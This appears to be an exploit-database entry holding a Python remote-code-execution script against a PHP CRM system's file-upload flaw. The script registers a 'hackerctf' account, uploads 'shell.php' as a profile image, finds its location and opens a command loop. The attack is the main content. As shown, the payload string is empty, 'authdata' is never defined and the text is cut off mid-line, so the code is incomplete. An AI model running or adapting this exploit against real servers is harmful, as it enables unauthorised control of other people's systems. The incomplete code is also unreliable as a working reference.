[webapps] Customer Relationship Management System (CRM) 1.0 - Remote Code Execution

[webapps] Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Date: 21.06.2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1.x
# Tested on: Ubuntu # REQUREMENTS # # run pip3 install requests colorama beautifulsoup4 # DESCRIPTION # # # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option # # Exploit Working:
# # 1. Starting a session with the server # # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag # # 4. Runing the payload file to give a shell #!/usr/bin/python3
import requests , time
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style # Variables : change the URL according to need
URL="" # CHANGE THIS shellcode = ""
filename = "shell.php"
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
def format_text(title,item): cr = '
' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session()
response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})
response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)
response = ShellSession.get(URL + "customer/")
soup = bs(response.text,"html.parser")
location= soup.find('img')['src'] #print statements
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore. ..

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